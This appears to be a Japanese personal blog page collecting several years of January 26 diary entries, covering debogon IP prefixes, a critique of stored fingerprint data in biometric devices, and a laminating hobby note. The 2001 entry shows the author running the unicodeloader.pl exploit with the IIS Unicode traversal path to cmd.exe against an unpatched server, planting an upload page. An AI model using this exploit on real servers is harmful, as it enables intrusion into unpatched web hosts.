2010年01月26日(火)<< 前の日記 | 次の日記 >>
この日の詳細

■1 1.1.1.1とか1.2.3.4のアドレス[http://www.nantoka.com/~kei/diary/?20100125S1][IPv6] このエントリーをはてなブックマークに追加

昨日の日記で、1.1.1.1とか1.2.3.4とかいうアドレスは何かとトラブルの元になりそうという話を書いたけれども、1.1.1.0/24と、1.2.3.0/24のアドレスブロックは、 APNICによるbogon解消プロジェクト(debogon project)[http://www.nic.ad.jp/ja/translation/announce/apnic/20060803.html] に割り当てられる様だ。
% Information related to '1.1.1.0/24AS12654'

route:          1.1.1.0/24
descr:          RIPE-NCC-RIS debogon prefix
origin:         AS12654
mnt-by:         RIPE-NCC-RPSL-MNT
mnt-by:         RIPE-NCC-RIS-MNT
source:         RIPE # Filtered

% Information related to '1.2.3.0/24AS12654'

route:          1.2.3.0/24
descr:          RIPE-NCC-RIS debogon prefix
origin:         AS12654
mnt-by:         RIPE-NCC-RPSL-MNT
mnt-by:         RIPE-NCC-RIS-MNT
source:         RIPE # Filtered
ということで、当面はうっかりミスが表面化することも避けられそうです。

■ 関連記事

詳細はこの日の詳細から

2005年01月26日(水)<< 前の日記 | 次の日記 >>
この日の詳細

■1ぐる[ぐる]次の記事 >> このエントリーをはてなブックマークに追加

いくつかのサイトを巡回。

荘内銀行続編[http://www.st.ryukoku.ac.jp/~kjm/security/ml-archive/connect24h/2005.01/msg00135.html]:

zone-h[http://www.zone-h.org/en/defacements/view/id=2001833/] によると、IIS4.0だったらしい。現在はIIS5.0で何事も無かったかの様に稼働中。アナウンスも無し。

発信者番号偽装[http://www.st.ryukoku.ac.jp/%7Ekjm/security/memo/2005/01.html#20050124__furikome]:

向こうでT1契約すればできそうな感じではありますが、そこまでやってモトが取れるのかという疑問もあります。
詳しく知りたい向きは、以下の本の第13章、巧妙な嘘あたりをどうぞ。

[IT Pro] 危ない案件から会社を守る[http://itpro.nikkeibp.co.jp/free/ITPro/OPINION/20050125/155212/]:

支払い関係のリスクの話。

「支払いの話になると怒る,機嫌が悪くなる」という客は要注意

あぁ。それは危険な香りがします。

ノーアポでひょっこり訪ねることはリスク管理面から見てもすごく大事なことです。お菓子持って「時間が空いたもので・・・」と言って行けばいいんですから。

このあたりになると、普通の会社の取引先の経営状態の見極め方と何にも変わらないですね。どの業界でも大事な事は大事。

働いたら負けかなと思ってる[http://www.geocities.jp/soso_evolution_x/neet1.jpg]:

あぁ。これがネタ元だったわけですね。この問題、真剣に考えないと日本の将来がないな。

買ってはいけない [ソーテック][http://www.higuchi.com/index.php?itemid=192]:

社内の連絡体制に相当の問題があった様だ。
液晶パネルの爪が折れたという修理で、依頼者の了解も取らずにハードディスクを初期化してしまったと。
もちろん、この場合のSOTECの対応には問題があるけれども、修理に出せばディスクの内容は戻ってこないことを覚悟しておいた方が良いし、セキュアなデータの保全を考えればバックアップ取ってから初期化して修理に出す必要があるかも知れない。

プロバイダ別 ntp サーバリスト[http://sonic64.hp.infoseek.co.jp/2004-12-02.html]:

福岡大学NTPサーバの混雑解消にご協力を[http://slashdot.jp/articles/05/01/21/0214236.shtml] という記事が出ていた。ウチもしばらくの間、福岡大学さんにお世話になっていたけれど、負荷分散させた方が良いだろうと思って、他の公開サーバを使っていた。
このリストで、初めてウチの上流プロバイダもntpサーバを公開していることを知った。

■ 関連記事

■2 生体認証への根本的な疑問[http://hski.air-nifty.com/weblog/2004/03/post_8.html][セキュリティ]<< 前の記事 | 次の記事 >> このエントリーをはてなブックマークに追加

結論を先に。バイオメトリクス認証機器は、バイオメトリクス情報そのものを保存してはいけない。

最近、セキュリティを強化するために、指紋認証に代表されるバイオメトリクス認証を用いる事例が多くなってきた。
特に指紋認証については、USBポートに刺す製品が非常に安価になってきていて、2万円以下で手に入る様だ。
しかし、多くの生体認証製品には大きな危険がある。リンク先で述べられている様に、

パスワード認証であれば、破られたときは、パスワードを変更すれば、正当な利用者が利用を続けることができる。ところが生体情報は、偽造されたことがわかった後、正当な利用者が利用を続けられるようにする方法が、まだ提案されていないような気がするのだ。

という問題がある。実際に、この問題は生体認証の未解決な大きな問題だ。

特に指紋認証製品については、指紋パターンをイメージとして持っている製品 *1 が多い。このデータを悪用すれば、その人になりすます事が容易に可能になる。
今後、指紋認証を使用する機会が増えてくると、色々なものに指紋認証の登録を行う事になる。 もし、その内のどれかから登録した指紋情報が漏洩するか悪用されるかすると、他の全てのシステムでなりすましの被害を受ける心配がある。さらに、その人は一生指紋認証を使う事ができなくなる。既にその人の指紋情報が秘密では無くなっているし、しかもそれは変更不可能だからだ。

このあたり、UNIXのパスワードやATMの暗証番号と比較すると問題が分かりやすい。多くのUNIXではパスワードは非可逆的な暗号化を行って格納している。正当なパスワードかどうかを調べる時には、同じ暗号化をしてみて、同じ暗号文になることを確認する。
この方法であれば、万が一暗号化されたパスワードファイルが盗み出されても、非可逆的な暗号だからパスワードそのものは危険にさらされない。攻撃者はパスワードの可能性のあるものを一つ一つ暗号化してみて、同じ暗号文になるものを探すという非効率的な攻撃しかできない。
ところがATMの暗証番号の場合は、暗証番号そのものを記録している。数字4桁だから、仮に暗証番号を暗号化しても10,000回の組み合わせを試せば良いので、暗号化する効果が期待できないという事情もある。
繰り返すけれども、暗証番号やパスワードは変更できるけれども、指紋は変更できない。

キャッシュカードの暗証番号とロッカーや携帯電話の番号を一緒にしていたために、偽造キャッシュカードでお金を引き出されるという事件が起きた。
こういう被害の発生を防ぐために、ATMに生体認証装置を取り付ける様にしたとしよう。カードを入れて指紋認証をするのだ。
一方、ゴルフ場でも盗難を防ぐために、ロッカーの鍵を指紋認証装置に変える。指紋を登録してロッカーの鍵を掛けて、開ける時も指紋で開ける事ができる。
ゴルフ場の事件[http://www.mainichi-msn.co.jp/shakai/jiken/news/20050120k0000m040171000c.html] では、支配人がマスターキーを使って、利用者が設定した暗証番号を知り *2 、偽造団に伝えていたという。
同じ事を指紋認証装置でやられたらどうなるか。ゴルフ場の指紋認証装置から登録指紋データを吸い出して、偽造指を作る。スキミングしたカードと偽造指を持って行って、一丁上がりだ。
偽造指にだまされない装置を作れば良いという主張があるかも知れないが、偽造指に騙されない装置はより多くの生体情報を取得しなければならない。それが盗まれたらどうするか、堂々巡りだ。

ゴルフ場の場合は、ロッカーの番号にキャッシュカードと同じ番号を使わないという自衛策がある。 過去の判例[http://www.ansin-jp.com/info/law_detail.php?page=120] でも、カードと同じ暗証番号をロッカーで使用するのは被害者側に過失があったとしている。
ところが指紋の場合は、違うものを使う事はできない。盗まれたら終わりなのだ。
また、繰り返すけれども、暗証番号やパスワードは変更できるけれども、指紋は変更できない。

ほとんどの指紋認証装置はもう一つの問題を抱えている。ガラス板の様なものに指を押し当てるタイプは、良質な指紋サンプルをガラス板そのものから得る事ができる。ガラス板をきれいにしておいて、ターゲットが利用した後に、粘着テープを押し当てれば良い。装置によっては、このサンプルから得た指紋画像でも騙されるものがあるという。

利用者側でやれることがあるとすると、指紋情報が盗まれる心配があるところで、指紋認証装置を使わないというのが一つの選択。指を選択できれば少しだけ安全になるけれども、指を指定している装置が多い。

指紋認証装置を導入する場合は、指紋情報が盗み出されたらどれだけの損害が発生するか考えておく必要がある。被害は個人情報漏洩の比ではないのだ。パスワードは変更できるかも知れないけれど、指紋は変更できない。
こういった意味での安全性を考えると、前述のUNIXのパスワードの様に指紋情報を直接保存しない装置が安全だけれども、私はそういう製品を一つしか知らない *3 し、まだ多くのメーカーはこの問題を重視していない様に思える。
バイオメトリクス認証が信頼して使用される様になるためには、この問題はクリアすべき課題である。
バイオメトリクス認証機器は、バイオメトリクス情報そのものを保存してはいけない。

加筆修正:

28日に 27日の記事[http://www.nantoka.com/~kei/diary/?200501c&to=200501271#T200501271] を踏まえて加筆修正をした。論旨は変えていないつもりだ。 28日[http://www.nantoka.com/~kei/diary/?200501c&to=200501281#T200501281] にも関連記事を書いた。
実は、この26日の記事を書いた時点では、Interfaceの3月号を読んでいなかったのだ。あまりにもタイムリーで驚いた。

*1: パターンマッチング法を採用している製品はパターンそのものを持っている。マニューシャ・チップマッチングは、特徴点周辺の指紋パターンを持っている。マニューシャ・リレーションはイメージそのものを持つ必要はないが、低価格の製品には使いづらい。周波数解析法は指紋像全体を用いずに照合できる。詳細は27日の日記を参照。
*2: この製品には非常に大きな欠陥がある。マスターキーを使うと利用者が設定した暗証番号の一覧が印字できる機能があったというのだ。普通に考えればそんな機能は不要で、指定したロッカーを開けるか、暗証番号が変更できるかすれば用が足りる。まるで利用者に知られずに開ける方法を提供したとしか思えない機能である。そんな機能は悪用されるためにある機能だ。利用者にしても、まさか暗証番号を取り出す機能があるとは思わないだろう。
*3: アルゴリズムをライセンスしているので製品としては複数出ている。ラインセンサータイプのものは、センサー表面に指紋が残る問題もクリアしている。Interface誌2005年3月号参照。

■ 関連記事

■3ラミネーターで片面のみラミネートするには[magic]<< 前の記事 このエントリーをはてなブックマークに追加

2枚あわせてラミネートして、縁を切り落とせば良い。厚さがあるので熱が足りずに接着が弱かったので、切り離した状態でもう一度通した。

何を作りたかったかというと:

バイシクルのカードを使っているのだけれど、これのケースが紙製で、中身より先にケースがボロボロになる事が多いので困っていた。
カードは紙製の割には、驚くほどの耐久力があるのに、ケースはそのままポケットに入れるものだからすぐボロボロになる。
で、ケント紙に印刷して
ケント紙に印刷したバイシクルのケース
こういうものを作った。A4サイズにきれいに二つ分収まる。
両面ラミネートすると、硬すぎてきれいに折り曲げられないので、片面ラミネートする必要があったのだ。完成すると、
完成したバイシクルケースのコピー品
こういった感じになる。両面の色が違うのは、ある用途に重宝する。

■ 関連記事

詳細はこの日の詳細から

2004年01月26日(月)<< 前の日記 | 次の日記 >>
この日の詳細

■1SYA!nikki[SYA!nikki] このエントリーをはてなブックマークに追加

■ 関連記事

詳細はこの日の詳細から

2002年01月26日()<< 前の日記 | 次の日記 >>
この日の詳細

■1 かめぬい[http://odin.prohosting.com/valcyrie/cgi-bin/diary/?200201c&to=200201253#200201253][IPv6] このエントリーをはてなブックマークに追加

当たるものなのかぁ・・・ 実はかめぬい欲しくて、通販関係を探したんですが、見つからなくてあきらめていたんですよねぇ。
IPv6サーバ1台につき、1個は必要。

■ 関連記事

詳細はこの日の詳細から

2001年01月26日(金)<< 前の日記 | 次の日記 >>
この日の詳細

■1 shell on IIS server with Unicode using *only* HTTP[http://www.securityfocus.com/frames/?content=/templates/archive.pike%3Ffromthread%3D0%26threads%3D0%26end%3D2001-01-27%26list%3D1%26mid%3D158336%26start%3D2001-01-21%26][セキュリティ]次の記事 >> このエントリーをはてなブックマークに追加

セキュリティホール memo[http://www.st.ryukoku.ac.jp/~kjm/security/memo/2001/01.html#20010125_iis] から。
この忙しいのに,パッチあてなきゃいけないお客さんがいるなぁ。 早く,FreeBSDに移行させねば。

実験してみた。:

パッチをあてていないサイトだと,
kei@xxxxx[205] ./unicodeloader.pl www.XXXXX.co.jp:80 'c:\InetPub\wwwroot'


Creating uploading webpage on www.XXXXX.co.jp on port 80.
The webroot is c:\InetPub\wwwroot.

testing directory /scripts/..%c0%af../winnt/system32/cmd.exe?/c
farmer brown directory: C:\Inetpub\scripts
sensepost.exe not found - lets copy it quick
uploading ASP section:
..............
uploading the INC section: (this may take a while)
................................................................................
................................................................................
........................
upload page created.

Now simply surf to www.XXXXX.co.jp/upload.asp and enjoy.
Files will be uploaded to c:\InetPub\wwwroot
なんて具合にいとも簡単に乗っ取れてしまいます。 後は,怪しいツールをインストールするなりページを書き換えるなりご自由にの状態になります。 wwwrootの物理位置を知る必要があるとは言っても, 多くのサイトはc:\InetPub\wwwrootでしょうから,ほとんど障壁になりません。 これはまずいな。

■ 関連記事

■2業界人脈半径は2hop<< 前の記事 このエントリーをはてなブックマークに追加

らしい。某MLで離れて久しい知人と会ってびっくり。 お互い業界(どの?)にいるとはいえ,もともと参加者そう多くも無いMLなので, やっぱり驚くですよ。
実はディープなユーザ密度が高いのかな [http://www.jp.freebsd.org/ml.html#isp-jp]

■ 関連記事

詳細はこの日の詳細から

以上、10 日分です。

指定日の日記を表示

前月 2020年01月 翌月
1 2 3 4
5 6 7 8 9 10 11
12 13 14 15 16 17 18
19 20 21 22 23 24 25
26 27 28 29 30 31

最近の日記

2019年04月01日

新元号「令和」について

2019年03月23日

DXアンテナ ワイヤレスチューナー メディアコンセント DMC10F1

2019年02月17日

#例のグラボを活用する

2019年01月03日

シリーズ5・myHomeAlexaで自分のCDをかける

2018年12月25日

シリーズ4・英語の楽曲・アルバム・アーティスト名をカタカナに直す

2018年12月23日

シリーズ3: Echo Dotがやってきた

2018年12月19日

続・Echo Dotがやってきた

分野別タイトル一覧


全て
CLIP
SYA!nikki
book
freebsd
hns
magic
おさけ
おしごと
お買いもの
ぐる
ごはん
アクセシビリティ
オープンソース
セキュリティ
音楽
地域情報化
電子自治体
日記

予定

    ToDo

      link

      keikuma on Twitter

      keikuma Name:前田勝之
      Location:長崎市
      Web:http://www.nantok...
      Bio:前田勝之(まえだかつゆき)。長崎在住。コンサル、SE、プログラマー、 なんとか株式会社代表、非常勤講師(情報セキュリティ)。 セキュアド、テクニカルエンジニア(SV,NW)。サーバ管理とWeb日記を10年ほど。 ネットとリアルの接点に関心あり。食べること・歌うこと・愛すること・作ること・飲むこと。おいしいものがぜんぶすき。

      サイト内検索

      Google AdSense

      Powered by hns-2.19.9, HyperNikkiSystem Project